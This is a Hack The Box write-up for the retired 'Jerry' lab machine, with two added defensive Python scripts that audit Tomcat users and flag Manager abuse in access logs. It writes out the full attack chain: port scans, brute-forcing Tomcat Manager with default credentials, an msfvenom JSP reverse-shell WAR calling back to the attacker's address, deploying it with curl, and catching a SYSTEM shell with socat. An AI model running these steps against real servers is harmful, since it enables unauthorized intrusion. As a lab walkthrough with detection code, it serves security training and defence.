Hack The Box Jerry Writeup

Published:
September 9, 2024

This is a writeup for the retired Hack The Box Jerry machine.

Solution Summary

Solution

The following steps are needed to retrieve the flags:

  1. Find out frequently used default passwords for Tomcat instances.
  2. Craft a reverse shell payload using Metasploit’s msfvenom.
  3. Upload the reverse shell payload using Tomcat’s deploy mechanism and launch the reverse shell.
  4. Read the flags from the Administrator’s desktop.

Nmap

Did you know that on Linux, ping is run as a setuid binary? Now that I know, it makes sense. Ping needs to send out raw (non-TCP) packets. Handling raw sockets requires the CAP_NET_RAW capability on Linux.

For example, the specific code that configures ping to be a setuid binary in NixOS can be found here.

# Nmap is a bit stubborn without sudo: it reports the host as down, apparently
# because the host drops its ping probes (OS detection via -A also needs root)
sudo nmap -sV -sC -A -oX machines/jerry/nmap.xml \
  10.10.10.95
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:38 JST
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   291.39 ms 10.10.16.1
2   291.38 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds

To be sure we don’t miss any TCP ports, we run a second TCP-only scan:

sudo nmap -p- -sT -oX machines/jerry/nmap_tcp.xml 10.10.10.95

We don’t find any other open ports after running an exhaustive scan:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:44 JST
Nmap scan report for 10.10.10.95
Host is up (0.084s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Findings:

Apache Tomcat

Landing page of Jerry’s Apache Tomcat


Apache Tomcat version 7.0.88 was released in 2018, and many vulnerabilities have been published for it since.

Three vulnerabilities look interesting because they are low-complexity and can lead to an RCE.

It turns out that, luckily, we can make use of a much easier vulnerability, as we will see below.

We try to identify interesting URLs:

feroxbuster --wordlist SecLists/Discovery/Web-Content/common.txt \
  --threads 10 --scan-limit 1 \
  --url http://10.10.10.95:8080 --silent | tee machines/jerry/feroxbuster.log

The following URL sticks out:

http://10.10.10.95:8080/manager/html

Cracking the admin panel password

Why don’t we brute-force our way into the admin panel located at /manager/html? Here’s what we see when we try to access it without any authentication:

curl http://10.10.10.95:8080/manager/html -I

We get a 401 status code, and the WWW-Authenticate header tells us that HTTP Basic authentication is required:

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 02:00:00 EET
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Mon, 09 Sep 2024 09:15:37 GMT

We try to brute-force the credentials using Patator, ignoring every response that still returns 401:

patator.py http_fuzz \
  url=http://10.10.10.95:8080/manager/html \
  method=GET \
  0=SecLists/Usernames/cirt-default-usernames.txt \
  1=SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt \
  user_pass=FILE0:FILE1 \
  -x ignore:code=401

admin:admin does the trick and we are logged in. tomcat:s3cret also seems to work.
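The counterpart on the defending side is to audit the Tomcat user store for exactly this situation. The script below is an added example (not part of the writeup or of Tomcat itself): it parses a tomcat-users.xml, lists every account that holds a Manager role, and flags those whose username/password pair is one of the defaults found above and those that hold manager-script, the role the text deploy API used later in this writeup requires. The sample XML and the KNOWN_DEFAULTS set are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml modelled on the accounts found on Jerry (not the box's real file).
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="admin"  password="admin"  roles="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Correct-Horse-Battery-Staple-2024" roles="manager-script"/>
</tomcat-users>
"""

# Credential pairs that worked in the writeup; extend with the wordlist used above.
KNOWN_DEFAULTS = {("admin", "admin"), ("tomcat", "s3cret")}
# Roles that grant access to the Manager application (GUI, text/script API, JMX proxy, status).
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

def _local(tag):
    """Strip an XML namespace ('{ns}user' -> 'user'); Tomcat 8+ files are namespaced."""
    return tag.rsplit("}", 1)[-1]

def load_users(xml_text):
    """Yield (username, password, set_of_roles) for every <user> element, in file order."""
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        yield name, el.get("password", ""), roles

def audit_tomcat_users(xml_text):
    """Return one finding per Manager-capable account: default creds? able to deploy WARs?"""
    findings = []
    for name, password, roles in load_users(xml_text):
        manager = sorted(roles & MANAGER_ROLES)
        if not manager:
            continue  # no Manager access: out of scope for this audit
        findings.append({
            "user": name,
            "roles": manager,
            "default_credential": (name, password) in KNOWN_DEFAULTS,
            "can_deploy": "manager-script" in manager,  # /manager/text/deploy, as used below
        })
    return findings

if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        flags = [k for k in ("default_credential", "can_deploy") if f[k]]
        print(f"{f['user']:<8} {','.join(f['roles']):<28} {' '.join(flags)}")
```

Any account with default_credential set should be removed or re-keyed, and manager-script should be limited to the deployment account that actually needs it.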

Logged in admin screen


Uploading a reverse shell

From /docs/manager-howto.html:

http://localhost:8080/manager/text/deploy?path=/foo

Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.

We craft a shell using msfvenom:

msfvenom --payload java/jsp_shell_reverse_tcp \
  --platform windows --arch x86 \
  LHOST=10.10.16.6 \
  LPORT=4444 \
  -f war > machines/jerry/msfvenom_shell.war

Then, we use curl to upload the msfvenom_shell.war file created above:

curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \
  --upload-file machines/jerry/msfvenom_shell.war

The upload works:

OK - Deployed application at context path /shell

We launch Socat locally:

socat -d TCP4-LISTEN:4444 STDIO
# Somewhere else
curl http://10.10.10.95:8080/shell/
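Both the password guessing against /manager/html and the WAR deployment through /manager/text/deploy leave a clear trace in Tomcat's access log. The detection below is an added example (not part of the writeup): it runs over constructed log lines in Tomcat's default "common" pattern (%h %l %u %t "%r" %s %b) that model the steps above, and raises an alert for a burst of 401s on the Manager app, for a successful Manager login following such a burst, and for any successful deployment request. The log sample and the five-failure threshold are assumptions.

```python
import re
from collections import defaultdict

# Tomcat "common" access-log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed log lines modelling this writeup: guessing, login, deploy, trigger, unrelated traffic.
SAMPLE_LOG = """\
10.10.16.6 - - [09/Sep/2024:18:15:37 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - - [09/Sep/2024:18:15:38 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - - [09/Sep/2024:18:15:38 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - - [09/Sep/2024:18:15:39 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - - [09/Sep/2024:18:15:39 +0900] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.6 - admin [09/Sep/2024:18:15:40 +0900] "GET /manager/html HTTP/1.1" 200 15832
10.10.16.6 - tomcat [09/Sep/2024:18:20:11 +0900] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 49
10.10.16.6 - - [09/Sep/2024:18:20:30 +0900] "GET /shell/ HTTP/1.1" 200 -
10.10.14.2 - - [09/Sep/2024:18:21:00 +0900] "GET / HTTP/1.1" 200 11217
"""

# Paths through which the Manager app installs a new web application (text API and GUI upload).
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload")

def detect_manager_abuse(log_text, threshold=5):
    """Return alert strings for Manager brute force, post-burst logins and deployments."""
    failures = defaultdict(int)  # client ip -> consecutive 401s on /manager/*
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/manager/"):
            continue
        ip, user, path, status = m["ip"], m["user"], m["path"], int(m["status"])
        if status == 401:
            failures[ip] += 1
            if failures[ip] == threshold:
                alerts.append(f"{ip}: {threshold} failed Manager logins (possible brute force)")
            continue
        if status == 200 and failures[ip] >= threshold and user != "-":
            alerts.append(f"{ip}: Manager login succeeded as '{user}' after {failures[ip]} failures")
            failures[ip] = 0
        if status == 200 and path.startswith(DEPLOY_PATHS):
            alerts.append(f"{ip}: application deployed via Manager by '{user}' ({m['method']} {path})")
    return alerts

if __name__ == "__main__":
    for alert in detect_manager_abuse(SAMPLE_LOG):
        print(alert)
```

The deploy alert fires even without a preceding brute force, since a legitimate deployment from an unexpected client is worth a look on its own.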

Retrieve flags

The shell works, and we are already running as a privileged user, since Tomcat itself runs as SYSTEM:

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
nt authority\system

We find the flags on the Administrator’s desktop:

dir C:\Users\Administrator\Desktop\flags\
06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,397,736,960 bytes free

Print out the flags:

type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

The flags are revealed:

user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.
